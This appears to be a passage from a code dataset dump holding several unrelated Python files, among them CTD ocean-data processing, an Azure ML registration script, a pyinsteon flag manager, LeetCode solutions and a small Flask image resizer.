mean.filled(fill_value=np.NaN)) >\n std.filled(fill_value=np.NaN))\n data[mask] = np.NaN\n\n # Pass two recompute the mean and std without the flagged values from pass\n # one and removed the flagged data.\n roll = rolling_window(data, block)\n roll = ma.masked_invalid(roll)\n std = n2 * roll.std(axis=1)\n mean = roll.mean(axis=1)\n # Use the last value to fill-up.\n std = np.r_[std, np.tile(std[-1], block - 1)]\n mean = np.r_[mean, np.tile(mean[-1], block - 1)]\n values = self.values.astype(float)\n mask = (np.abs(values - mean.filled(fill_value=np.NaN)) >\n std.filled(fill_value=np.NaN))\n\n clean = self.astype(float).copy()\n clean[mask] = np.NaN\n return clean\n\n\ndef lp_filter(data, sample_rate=24.0, time_constant=0.15):\n \"\"\"\n Filter a series with `time_constant` (use 0.15 s for pressure), and for\n a signal of `sample_rate` in Hertz (24 Hz for 911+).\n NOTE: 911+ systems do not require filter for temperature nor salinity.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> from ctd import DataFrame, lp_filter\n >>> raw = DataFrame.from_cnv(data_path.joinpath('CTD-spiked-unfiltered.cnv.bz2'))\n >>> prc = DataFrame.from_cnv(data_path.joinpath('CTD-spiked-filtered.cnv.bz2'))\n >>> kw = dict(sample_rate=24.0, time_constant=0.15)\n >>> original = prc.index.values\n >>> unfiltered = raw.index.values\n >>> filtered = lp_filter(unfiltered, **kw)\n >>> fig, ax = plt.subplots()\n >>> l1, = ax.plot(original, 'k', label='original')\n >>> l2, = ax.plot(unfiltered, 'r', label='unfiltered')\n >>> l3, = ax.plot(filtered, 'g', label='filtered')\n >>> leg = ax.legend()\n >>> _ = ax.axis([33564, 33648, 1034, 1035])\n\n Notes\n -----\n http://wiki.scipy.org/Cookbook/FIRFilter\n\n\n \"\"\"\n\n from scipy import signal\n\n if True: # Butter is closer to what SBE is doing with their cosine filter.\n Wn = (1. / time_constant) / (sample_rate * 2.)\n b, a = signal.butter(2, Wn, 'low')\n data = signal.filtfilt(b, a, data)\n\n return data\n\n\ndef cell_thermal_mass(temperature, conductivity):\n \"\"\"\n Sample interval is measured in seconds.\n Temperature in degrees.\n CTM is calculated in S/m.\n\n \"\"\"\n\n alpha = 0.03 # Thermal anomaly amplitude.\n beta = 1. 
/ 7 # Thermal anomaly time constant (1/beta).\n\n sample_interval = 1 / 15.\n a = 2 * alpha / (sample_interval * beta + 2)\n b = 1 - (2 * a / alpha)\n dCodT = 0.1 * (1 + 0.006 * (temperature - 20))\n dT = np.diff(temperature)\n ctm = -1.0 * b * conductivity + a * (dCodT) * dT # [S/m]\n return ctm\n\n\ndef press_check(self, column='index'):\n \"\"\"\n Remove pressure reversals.\n\n \"\"\"\n data = self.copy()\n if column != 'index':\n press = data[column]\n else:\n press = data.index.values.astype(float)\n\n ref = press[0]\n inversions = np.diff(np.r_[press, press[-1]]) < 0\n mask = np.zeros_like(inversions)\n for k, p in enumerate(inversions):\n if p:\n ref = press[k]\n cut = press[k + 1:] < ref\n mask[k + 1:][cut] = True\n data[mask] = np.NaN\n return data\n\n\ndef bindata(self, delta=1., method='averaging'):\n \"\"\"\n Bin average the index (usually pressure) to a given interval (default\n delta = 1).\n\n Note that this method does not drop NA automatically. Therefore, one can\n check the quality of the binned data.\n\n \"\"\"\n if method == 'averaging':\n start = np.floor(self.index[0])\n end = np.ceil(self.index[-1])\n shift = delta / 2. # To get centered bins.\n new_index = np.arange(start, end, delta) - shift\n new_index = Index(new_index)\n newdf = self.groupby(new_index.asof).mean()\n newdf.index += shift # Not shifted.\n else:\n newdf = self.copy()\n\n return newdf\n\n\ndef split(self):\n \"\"\"Returns a tuple with down/up-cast.\"\"\"\n down = self.iloc[:self.index.argmax()]\n up = self.iloc[self.index.argmax():][::-1] # Reverse up index.\n return down, up\n\n\ndef movingaverage(series, window_size=48):\n window = np.ones(int(window_size)) / float(window_size)\n return Series(np.convolve(series, window, 'same'), index=series.index)\n\n\ndef smooth(self, window_len=11, window='hanning'):\n \"\"\"Smooth the data using a window with requested size.\"\"\"\n\n windows = {\n 'flat': np.ones,\n 'hanning': np.hanning,\n 'hamming': np.hamming,\n 'bartlett': np.bartlett,\n 'blackman': np.blackman\n }\n data = self.values.copy()\n\n if window_len < 3:\n return Series(data, index=self.index, name=self.name)\n\n if window not in list(windows.keys()):\n raise ValueError(\"\"\"window must be one of 'flat', 'hanning',\n 'hamming', 'bartlett', 'blackman'\"\"\")\n\n s = np.r_[2 * data[0] - data[window_len:1:-1], data, 2 *\n data[-1] - data[-1:-window_len:-1]]\n\n w = windows[window](window_len)\n\n data = np.convolve(w / w.sum(), s, mode='same')\n data = data[window_len - 1:-window_len + 1]\n return Series(data, index=self.index, name=self.name)\n\n\ndef mixed_layer_depth(CT, method='half degree'):\n if method == 'half degree':\n mask = CT[0] - CT < 0.5\n else:\n mask = np.zeros_like(CT)\n return Series(mask, index=CT.index, name='MLD')\n\n\ndef barrier_layer_thickness(SA, CT):\n \"\"\"\n Compute the thickness of water separating the mixed surface layer from the\n thermocline. 
A more precise definition would be the difference between\n mixed layer depth (MLD) calculated from temperature minus the mixed layer\n depth calculated using density.\n\n \"\"\"\n import gsw\n sigma_theta = gsw.sigma0(SA, CT)\n mask = mixed_layer_depth(CT)\n mld = np.where(mask)[0][-1]\n sig_surface = sigma_theta[0]\n sig_bottom_mld = gsw.sigma0(SA[0], CT[mld])\n d_sig_t = sig_surface - sig_bottom_mld\n d_sig = sigma_theta - sig_bottom_mld\n mask = d_sig < d_sig_t # Barrier layer.\n return Series(mask, index=SA.index, name='BLT')\n\n\ndef derive_cnv(self):\n \"\"\"Compute SP, SA, CT, z, and GP from a cnv pre-processed cast.\"\"\"\n import gsw\n cast = self.copy()\n p = cast.index.values.astype(float)\n cast['SP'] = gsw.SP_from_C(cast['c0S/m'].values * 10.,\n cast['t090C'].values, p)\n cast['SA'] = gsw.SA_from_SP(cast['SP'].values, p, self.lon, self.lat)\n cast['SR'] = gsw.SR_from_SP(cast['SP'].values)\n cast['CT'] = gsw.CT_from_t(cast['SA'].values, cast['t090C'].values, p)\n cast['z'] = -gsw.z_from_p(p, self.lat)\n cast['sigma0_CT'] = gsw.sigma0(cast['SA'].values, cast['CT'].values)\n return cast\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"ctd/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"638591144","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright © 2016 Ryan Kanno \n#\n# Distributed under terms of the MIT license.\n\nimport datetime\nfrom docx import Document\nimport os\n\n\ndef create_uipa_document_request_from_foi_request(foi_request):\n curr = os.path.dirname(os.path.realpath(__file__))\n return create_uipa_document_request(\n os.path.join(curr, 'data/Request-Access-form-12.1.15-fillable.docx'),\n datetime.datetime.utcnow(),\n foi_request.public_body.name,\n foi_request.public_body.email,\n foi_request.secret_address,\n foi_request.secret_address,\n foi_request.secret_address,\n foi_request.description,\n False)\n\n\ndef create_uipa_document_request(\n document_path,\n request_date,\n agency_name,\n agency_contact_information,\n requester_name,\n requester_contact_information,\n requester_email_address,\n request_text,\n should_waive_fees=False):\n\n # TODO: @ryankanno - Make case insensitive regexs at some point\n DELIMITER_REPLACEMENT_MAP = {\n \"[Request_Date]\": request_date.strftime('%m-%d-%Y'),\n \"[Agency_Name]\": agency_name,\n \"[Agency_Contact_Information]\": agency_contact_information,\n \"[Requester_Name]\": requester_name,\n \"[Requester_Contact_Information]\": requester_contact_information,\n \"[Requester_Email_Address]\": requester_email_address,\n \"[Request]\": request_text\n }\n\n document = Document(document_path)\n paragraphs = document.paragraphs\n\n for idx, paragraph in enumerate(paragraphs):\n for k, v in DELIMITER_REPLACEMENT_MAP.iteritems():\n if k in paragraph.text:\n paragraph.text = paragraph.text.replace(k, v)\n\n if \"[CB]\" in paragraph.text:\n paragraph.text = paragraph.text.replace(\n \"[CB]\",\n \"[X]\" if should_waive_fees else \"[ ]\")\n\n return document\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Testing, yo.\n \"\"\"\n document = create_uipa_document_request(\n './data/Request-Access-form-12.1.15-fillable.docx',\n datetime.datetime.utcnow(),\n \"Department of Development\",\n \"Ryan Kanno\",\n \"Sara Kanno\",\n \"sara@kanno.io\",\n \"sara@kanno.io\",\n \"Can I get access to code?\",\n False)\n\n document.save(\n 
'./data/{0}-FALSE-Request-Access-form-12.1.15-fillable.docx'.format(\n datetime.datetime.utcnow().isoformat()))\n\n document = create_uipa_document_request(\n './data/Request-Access-form-12.1.15-fillable.docx',\n datetime.datetime.utcnow(),\n \"Department of Development\",\n \"Ryan Kanno\",\n \"Sara Kanno\",\n \"sara@kanno.io\",\n \"sara@kanno.io\",\n \"Can I get access to code?\",\n True)\n\n document.save(\n './data/{0}-TRUE-Request-Access-form-12.1.15-fillable.docx'.format(\n datetime.datetime.utcnow().isoformat()))\n\n# vim: fenc=utf-8\n# vim: filetype=python\n","sub_path":"uipa_org/theme/doc_utilities.py","file_name":"doc_utilities.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"24567716","text":"# Copyright (c) 2021 Microsoft\n# \n# This software is released under the MIT License.\n# https://opensource.org/licenses/MIT\n\nimport json\nfrom pathlib import Path\nfrom typing import Tuple\nimport logging\n\nimport click\nfrom azureml.core import Run, Experiment, Workspace\n\n# Retrieve the run, experiment and workspace\nrun = Run.get_context()\nexperiment: Experiment = run.experiment\nworkspace: Workspace = experiment.workspace\n\nMETADATA_JSON = \"metadata.json\"\nRECOMMENDATION_JSON = 'recommend.json'\n\ndef read_metadata(folder_path: str) -> dict:\n model_metadata_path = Path(folder_path)\n model_metadata_file = model_metadata_path / METADATA_JSON\n\n with open(model_metadata_file, 'r') as fo:\n metadata = json.load(fo)\n\n return metadata\n\ndef read_recommendation(folder_path: str) -> bool:\n recommendation_path = Path(folder_path)\n recommendation_file = recommendation_path / RECOMMENDATION_JSON\n\n with open(recommendation_file, 'r') as fo:\n recommendation = json.load(fo)\n\n return recommendation.get('register', False)\n\n\n@click.command(\n context_settings=dict(\n ignore_unknown_options=True,\n allow_extra_args=True,\n )\n)\n@click.option(\"--force\", type=bool, default=False,\n help=\"Force model registration\")\n@click.option(\"--skip\", type=bool, default=False,\n help=\"Skip model registration\")\n@click.option(\"--model-metadata\", required=True,\n type=click.Path(exists=True,\n file_okay=True,\n dir_okay=True),\n help=\"The folder where the model files are stored\")\n@click.option(\"--register-model-folder\", \"register_folder\", required=True,\n type=click.Path(exists=True,\n file_okay=True,\n dir_okay=True),\n help=\"The folder where the deploy indicator is stored\")\n@click.option(\"--model-name\", type=str)\ndef main(force: bool, skip: bool, model_metadata: str, register_folder: str, model_name: str):\n if force and skip:\n raise ValueError(\"Model registration cannot be both forced and skipped\")\n \n # Determine if the model should be registered\n if skip:\n print(\"Registration skipped\")\n register_recommended = False\n elif force:\n print(\"Model registration forced\")\n register_recommended = True\n else:\n register_recommended = read_recommendation(folder_path=register_folder)\n print(f\"Model Registration Is Recommended?: {register_recommended}\")\n \n\n # If model registration is recommended, then register the model\n if register_recommended:\n metadata = read_metadata(model_metadata)\n challenger_model_run = Run.get(workspace=workspace, run_id=metadata['run_id'])\n \n challenger_model_run.register_model(\n model_name, \n model_path=metadata['model_path']\n )\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"modules/4-pipeline/register/register_model.py","file_name":"register_model.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"449113041","text":"import sys\nsys.stdin = open('4041_활주로 건설.txt', 'r')\n\nT = int(input())\n\nfor test_case in range(1, T+1):\n N, X = map(int, input().split()) #N: 행렬 크기 / X: 높이 1인 경사로의 길이\n land = []\n for ground in range(N):\n land.append(list(map(int, input().split())))\n#\n land_row = land\n land_column = []\n for i in range(N):\n land_column.append([row[i] for row in land])\n#\n\n#메커니즘 생각이 안됨\n # for i in range(N):\n # for j in range(N):\n # land_row[i][j]\n # land_column[i][j]","sub_path":"SSAFY/이전_Pycharm_lym-master/4041_활주로 건설.py","file_name":"4041_활주로 건설.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"179861259","text":"import csv\n\nimport numpy as np\n\n\nclass Groups:\n def __init__(self, g1, g2, g3, g4):\n self.final_labels = []\n\n self.g1_data = []\n self.g2_data = []\n self.g3_data = []\n self.g4_data = []\n\n self.combined_data = []\n self.final_data = []\n\n self.final_x = []\n self.final_y = []\n self.final_z = []\n\n self.obtain_data(g1)\n self.obtain_data(g2)\n self.obtain_data(g3)\n self.obtain_data(g4)\n\n # print(self.g1_data)\n # print(self.g2_data)\n # print(self.g3_data)\n # print(self.g4_data)\n self.format_data()\n # print(self.final_data)\n\n\n def obtain_data(self, fileName):\n with open(fileName) as f:\n so = csv.reader(f, delimiter=',', quotechar='\"')\n so = list(so)\n # add all the data to their respective array\n label = \"\"\n # add label to the end\n if(fileName == \"G1.csv\"):\n label = \"g1\"\n self.g1_data = [list(map(int, i)) for i in so]\n self.combined_data.append(self.g1_data)\n elif (fileName == \"G2.csv\"):\n label = \"g2\"\n self.g2_data = [list(map(int, i)) for i in so]\n self.combined_data.append(self.g2_data)\n elif (fileName == \"G3.csv\"):\n label = \"g3\"\n self.g3_data = [list(map(int, i)) for i in so]\n self.combined_data.append(self.g3_data)\n elif (fileName == \"G4.csv\"):\n label = \"g4\"\n self.g4_data = [list(map(int, i)) for i in so]\n self.combined_data.append(self.g4_data)\n\n # split up the data into x, y, and z arrays\n for i in range(0, len(so)):\n self.final_x.append(int(so[i][0]))\n self.final_y.append(int(so[i][1]))\n self.final_z.append(int(so[i][2]))\n self.final_labels.append(label)\n\n def format_data(self):\n for i in range (0, len(self.combined_data)):\n for j in range(0, len(self.combined_data[i])):\n self.final_data.append(self.combined_data[i][j])\n","sub_path":"groupSeparation.py","file_name":"groupSeparation.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"616089690","text":"\"\"\"Manage getting an operating flag.\"\"\"\nimport asyncio\nimport logging\nfrom collections import namedtuple\n\nfrom ..address import Address\nfrom ..constants import ResponseStatus\nfrom ..handlers.to_device.get_operating_flags import GetOperatingFlagsCommand\nfrom ..handlers.to_device.set_operating_flags import SetOperatingFlagsCommand\nfrom ..utils import multiple_status\n\nOperatingFlagInfo = namedtuple(\"FlagInfo\", \"name group bit set_cmd unset_cmd\")\n_LOGGER = logging.getLogger(__name__)\nMAX_RETRIES = 5\n\n\nclass GetSetOperatingFlagsManager:\n \"\"\"Manager to get operating 
flags.\"\"\"\n\n def __init__(self, address: Address, op_flags):\n \"\"\"Init the GetOperatingFlagsManager class.\"\"\"\n self._address = Address(address)\n self._op_flags = op_flags\n self._groups = {}\n self._flags = {}\n self._get_command = GetOperatingFlagsCommand(self._address)\n self._set_command = SetOperatingFlagsCommand(self._address)\n self._get_command.subscribe(self._update_flags)\n self._send_lock = asyncio.Lock()\n self._extended_write = False\n self._set_command.subscribe(self._check_write_response)\n\n @property\n def extended_write(self):\n \"\"\"Return if an extended message is required.\"\"\"\n return self._extended_write\n\n @extended_write.setter\n def extended_write(self, value: bool):\n \"\"\"Set the extended write flag.\"\"\"\n self._extended_write = bool(value)\n\n def subscribe(self, name, group, bit, set_cmd, unset_cmd):\n \"\"\"Subscribe to updates.\"\"\"\n flag_info = OperatingFlagInfo(name, group, bit, set_cmd, unset_cmd)\n if self._groups.get(group) is None:\n self._groups[group] = {}\n if bit is not None:\n self._groups[group][bit] = flag_info\n else:\n self._groups[group] = flag_info\n self._flags[name] = flag_info\n\n def unsubscribe(self, name):\n \"\"\"Remove a flag from updates.\"\"\"\n flag_info = self._flags.get(name)\n if flag_info:\n group = flag_info.group\n bit = flag_info.bit\n self._remove(name, group, bit)\n\n def _remove(self, name, group, bit=None):\n try:\n if bit is not None:\n self._groups[group].pop(bit)\n else:\n self._groups.pop(group)\n except KeyError:\n pass\n\n try:\n self._flags.pop(name)\n except KeyError:\n pass\n\n async def async_read(self, group=None):\n \"\"\"Get the operating flags.\"\"\"\n results = []\n if group is None:\n for curr_group in self._groups:\n result = await self._async_read(curr_group)\n results.append(result)\n return multiple_status(*results)\n return await self._async_read(group)\n\n async def _async_read(self, group):\n retries = 0\n result = ResponseStatus.UNSENT\n while retries < MAX_RETRIES and result != ResponseStatus.SUCCESS:\n result = await self._get_command.async_send(group)\n retries += 1\n return result\n\n async def async_write(self):\n \"\"\"Set the operating flags.\"\"\"\n results = []\n for name in self._op_flags:\n if self._op_flags[name].is_dirty:\n flat_info = self._flags[name]\n result = await self._async_write(flat_info)\n results.append(result)\n return multiple_status(*results)\n\n async def _async_write(self, flag_info):\n flag = self._op_flags[flag_info.name]\n should_set = not flag.new_value if flag.is_reversed else flag.new_value\n cmd = flag_info.set_cmd if should_set else flag_info.unset_cmd\n if cmd is not None: # The operating flag is read only\n retries = 0\n result = ResponseStatus.UNSENT\n\n while retries < MAX_RETRIES and result != ResponseStatus.SUCCESS:\n result = await self._set_command.async_send(\n cmd=cmd, extended=self._extended_write\n )\n retries += 1\n\n if result == ResponseStatus.SUCCESS:\n flag.load(flag.new_value)\n return result\n # Reset the read only flag to original value\n flag.load(flag.value)\n return ResponseStatus.SUCCESS\n\n def _check_write_response(self, response):\n \"\"\"Confirm if the write command requires Standard or Extended messages.\n\n This is called when the command is responded to with a Direct NAK. 
The code in cmd2\n is returned in response.\n \"\"\"\n _LOGGER.debug(\"Received set command response: %s\", response)\n if response == 0xFD:\n self._extended_write = True\n\n def _update_flags(self, group, flags):\n \"\"\"Update each flag.\"\"\"\n if not self._groups.get(group):\n return\n\n if isinstance(self._groups[group], OperatingFlagInfo):\n flag_info = self._groups[group]\n flag = self._op_flags[flag_info.name]\n flag.load(flags)\n return\n\n for bit in self._groups[group]:\n flag_info = self._groups[group][bit]\n flag = self._op_flags[flag_info.name]\n value = bool(flags & 1 << flag_info.bit)\n flag.load(value)\n","sub_path":"pyinsteon/managers/get_set_op_flag_manager.py","file_name":"get_set_op_flag_manager.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"293931925","text":"#! /usr/bin/python\n\nimport matplotlib.pyplot as plt\n\nf = open(\"risultatiK8.txt\", \"r\")\n\nlines = f.readlines()\n\nxs = range(50, 250, 50)\n#xs = map(lambda x: x+50, xs)\n\n\narr1 = map(lambda x: float(x), lines[0].split())\nplt.plot(xs, arr1, label='Messaggi Inviati', marker='o')\n\narr2 = map(lambda x: float(x), lines[1].split())\nplt.plot(xs, arr2, label='Messaggi Ricevuti', marker='^')\n\narr3 = map(lambda x: float(x), lines[2].split())\nplt.plot(xs, arr3, label='Messaggi Scartati', marker='s')\n\n\nplt.title('grafico K=8')\nplt.grid(True)\nplt.xlim([50, 250])\nplt.xlabel('Numero nodi')\nplt.ylabel('Messaggi')\n\n\nplt.legend(loc='upper left')\n\nplt.show()\n\n","sub_path":"randomGossip/graficoK8.py","file_name":"graficoK8.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"566884943","text":"import numpy as np\r\nimport quadprog\r\n\r\ndef quadprog_solve_qp(P, q, G=None, h=None, A=None, b=None):\r\n qp_G = .5 * (P + P.T) # make sure P is symmetric\r\n qp_a = -q\r\n if A is not None:\r\n qp_C = -np.vstack([A, G]).T\r\n qp_b = -np.hstack([b, h])\r\n meq = A.shape[0]\r\n else: # no equality constraint\r\n qp_C = -G.T\r\n qp_b = -h\r\n meq = 0\r\n return quadprog.solve_qp(qp_G, qp_a, qp_C, qp_b, meq)[0]\r\n\r\nM = np.array([[1., 2., 0.], [-8., 3., 2.], [0., 1., 1.]])\r\nP = np.dot(M.T, M)\r\nq = np.dot(np.array([3., 2., 3.]), M).reshape((3,))\r\nG = np.array([[1., 2., 1.], [2., 0., 1.], [-1., 2., -1.]])\r\nh = np.array([3., 2., -2.]) # assumed bound vector; h was undefined in the original, so the call below crashed\r\n\r\n## NOT DONE YET\r\n\r\n\r\nH = np.matrix( [[1,2], [3,4] ])\r\nf = np.array( [0,0] )\r\nA = np.matrix( [[-1,0], [0,-1]] )\r\nb = np.array( [-1,-1] )\r\n\r\nx = quadprog_solve_qp(P, q, G, h)\r\n\r\nprint(x)","sub_path":"Dell-Precision/Expts/Optimization/opt_qp2_scratch.py","file_name":"opt_qp2_scratch.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"192614839","text":"from collections import Counter\r\n\r\nfrom core.entities import Role\r\nfrom core.instance import votes, emperor, roles, claims\r\n\r\n# todo: read from json + read curr_cardinal id from redis\r\nn_cardinals = 9\r\nelectors = (\"CZ\", \"BB\", \"KL\", \"MN\", \"RH\", \"SX\", \"TE\")\r\ncardinals = ('car-{}'.format(i) for i in range(n_cardinals))\r\n\r\n\r\ndef vote(roleId: str, vote: str):\r\n role: Role = roles.get(roleId)\r\n allvotes: dict = votes.get(role.vote_role)\r\n votingState = allvotes.pop('state')\r\n\r\n # 1) Check if vote is valid\r\n if not role or not role.vote_role:\r\n return False\r\n\r\n if role.vote_role == 'DE':\r\n # 
Check if there's an emperor\r\n emp = emperor.get()\r\n if emp:\r\n return False\r\n\r\n if votingState == 'vote':\r\n if roleId == 'IT':\r\n return False\r\n elif votingState == 'veto':\r\n if roleId != 'IT':\r\n return False\r\n else:\r\n return False\r\n elif role.vote_role == 'IT':\r\n if not votingState == 'vote':\r\n return False\r\n\r\n # Check if there's a pope already\r\n claim = claims.get(role.vote_role)\r\n\r\n if claim:\r\n return False\r\n\r\n # 2) submit vote\r\n votes.save(role.vote_role, roleId, vote)\r\n allvotes[roleId] = vote\r\n\r\n # 3) Get winner\r\n (winner, winnerCount), (_, runnerUpCount) = Counter(allvotes.values()).most_common(2)\r\n if winnerCount == runnerUpCount or winner == '-1':\r\n winner = None\r\n everyoneVoted = '-1' not in allvotes.values()\r\n\r\n # 4) Switch voting state conditionally\r\n if role.vote_role == 'DE':\r\n if votingState == 'vote':\r\n if everyoneVoted:\r\n if winner:\r\n # Propagate to veto state\r\n votes.save(role.vote_role, roleId, vote)\r\n votes.save(role.vote_role, 'state', 'veto')\r\n votes.save(role.vote_role, 'winner', winner)\r\n else:\r\n # Reset vote\r\n votes.delete()\r\n votes.save(role.vote_role, 'state', 'vote')\r\n votes.create(role.vote_role, electors, \"-1\")\r\n\r\n elif votingState == 'veto':\r\n if vote == 'Y':\r\n # the pope has accepted the new emperor\r\n votes.save(role.vote_role, 'state', '-1')\r\n # we do not save the pope's vote\r\n emperor.save(winner)\r\n\r\n # DEUS VULT\r\n else:\r\n # pope vetoed; reset vote (1.1)\r\n votes.delete()\r\n votes.create(role.vote_role, electors)\r\n votes.create(role.vote_role, 'state', 'vote')\r\n\r\n\r\n elif role.vote_role == 'IT':\r\n if everyoneVoted:\r\n if winner:\r\n # new pope has been elected. WHITE SMOKE\r\n votes.create(role.vote_role, 'state', '-1')\r\n\r\n # change role for cardinal\r\n fingerprint = claims.get(winner)\r\n claims.delete(winner)\r\n claims.create('IT', fingerprint)\r\n\r\n # End of voting 1)\r\n # ----------------\r\n else:\r\n # vote failed; reset vote (3)\r\n votes.delete()\r\n votes.save(role.vote_role, 'state', 'vote')\r\n votes.create(role.vote_role, cardinals, \"-1\")\r\n\r\n return allvotes\r\n","sub_path":"core/votes.py","file_name":"votes.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"426584766","text":"\"\"\"\n_common.py\n\nauxiliary functions for scripts\n\"\"\"\nimport pyart\nfrom ..components import RadarDisplay, LinkPlugins, SelectRegion\n\n\ndef _add_all_advanced_tools(menu):\n\n # add grafical starts\n menu.addComponent(LinkPlugins)\n menu.addComponent(RadarDisplay)\n menu.addComponent(SelectRegion)\n\n # add all plugins to grafical start\n try:\n from .. 
import plugins\n for plugin in plugins._plugins:\n menu.addComponent(plugin)\n except:\n import warnings\n warnings.warn(\"Loading Plugins Fail\")\n\n\ndef _parse_dir(DirIn):\n if DirIn is None: # avoid reference to path while building documentation\n DirIn = os.getcwd()\n return DirIn\n\nZlike = ['CZ', 'DZ', 'AZ', 'Z',\n 'dbz', 'DBZ', 'dBZ', 'DBZ_S', 'DBZ_K',\n 'reflectivity_horizontal', 'DBZH', 'corr_reflectivity']\n\n\ndef _parse_field(container, field):\n '''\n Hack to perform a check on reflectivity to make it work with\n a larger number of files as there are many nomenclature is the\n weather radar world.\n\n This should only occur upon start up with a new file.\n '''\n\n if field is None:\n field = pyart.config.get_field_name('reflectivity')\n if container is None:\n return field\n\n fieldnames = container.fields.keys()\n Zinfile = set(fieldnames).intersection(Zlike)\n\n if field not in fieldnames and len(Zinfile) > 0:\n field = Zinfile.pop()\n\n return field\n","sub_path":"artview/scripts/_common.py","file_name":"_common.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"610623463","text":"# 翻转一棵二叉树。 \n# \n# 示例: \n# \n# 输入: \n# \n# 4\n# / \\\n# 2 7\n# / \\ / \\\n# 1 3 6 9 \n# \n# 输出: \n# \n# 4\n# / \\\n# 7 2\n# / \\ / \\\n# 9 6 3 1 \n# \n# 备注: \n# 这个问题是受到 Max Howell 的 原问题 启发的 : \n# \n# 谷歌:我们90%的工程师使用您编写的软件(Homebrew),但是您却无法在面试时在白板上写出翻转二叉树这道题,这太糟糕了。 \n# Related Topics 树\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def invertTree1(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: TreeNode\n \"\"\"\n if not root:\n return None\n left = self.invertTree1(root.left)\n right = self.invertTree1(root.right)\n root.left = right\n root.right = left\n return root\n\n def invertTree(self, root):\n if not root:\n return None\n queue = [root]\n while queue:\n curr = queue.pop()\n temp = curr.left\n curr.left = curr.right\n curr.right = temp\n if curr.left:\n queue.append(curr.left)\n if curr.right:\n queue.append(curr.right)\n return root\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"leetcode/editor/cn/[226]翻转二叉树.py","file_name":"[226]翻转二叉树.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"193522462","text":"from io import BytesIO\nfrom flask import Flask, send_file\nfrom PIL import Image\n\napp = Flask(__name__)\n\n'''\nFor something real, I would have used a more elegant URL structure.\nIn general, these kinds of arguments tend to go in the query, not the path.\nHowever, for code simplicity, using Flask's built in named path parameters seemed optimal.\n'''\n@app.route('///')\ndef index(image_file, width, height):\n # Load a Pillow Image from the specified file\n image = Image.open('static/' + image_file)\n\n # Resize to provided dimensions\n resized_image = image.resize((width, height))\n\n # In memory byte stream so we dont have to save a temp file\n image_io = BytesIO()\n\n # We need the file extension to determe the format for saving the image\n file_extension = image_file.split('.')[-1]\n\n # Save the resized image to the byte stream with the original file's format\n # Note: Pillow requires format \"jpeg\" and not \"jpg\"\n resized_image.save(image_io, 
'jpeg' if file_extension == 'jpg' else file_extension)\n\n # Reset the stream seek to the beginning so send_file can return something other than a spent stream\n image_io.seek(0)\n\n # Flask builtin helper to send files. Instead, we send a bytestream with an image mimetype\n return send_file(image_io, mimetype='image/' + file_extension)\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"364479780","text":"import numpy as np\nfrom scipy.interpolate import splrep, splev\nimport matplotlib.pyplot as plt\n\npp6770 = np.transpose(np.loadtxt('postproc/exprs_averaged_s06770.dat'))\npp0000 = np.transpose(np.loadtxt('input_profiles.dat'))\n\ndpsi = pp0000[0][1] - pp0000[0][0]\n\npsi = pp6770[0]\npsi0 = pp0000[0]\nT = pp6770[1]\nT0 = pp0000[5]\ndT0_dpsi = pp0000[6]\nDperp0 = pp0000[9]\n\nsmoothing = 0.000000000005\ntck = splrep(psi, T, s=smoothing)\ntck0 = splrep(psi0, T0, s=smoothing)\ntck0_dT0_dpsi = splrep(psi0, dT0_dpsi, s=smoothing)\ntck0_Dperp0 = splrep(psi0, Dperp0, s=smoothing)\n\npsi_int = np.arange(0, 1.0, dpsi)\npsi0_int = np.arange(0, 1.0, dpsi)\nT_int = splev(psi_int, tck, der=0)\nT0_int = splev(psi0_int, tck0, der=0)\ndT0_dpsi_int = splev(psi0_int, tck0_dT0_dpsi, der=0)\nDperp0_int = splev(psi0_int, tck0_Dperp0, der=0)\ndT_dpsi_int = splev(psi_int, tck, der=1)\n\nmodifier = dT_dpsi_int / (dT0_dpsi_int)\nDperp_new = modifier * Dperp0_int\n\n#plt.plot(pp0000[0], pp0000[5], 'g', psi_int, T_int, 'r', psi_int, dT_dpsi_int, 'b')\n#plt.show()\n\n#modifier = dT_dpsi / (dT_dpsi + dT_dpsi0)\n#Dperp = pp0000[9]\n#Dperp_new = modifier*Dperp\n\n#plt.plot(psi0_int, 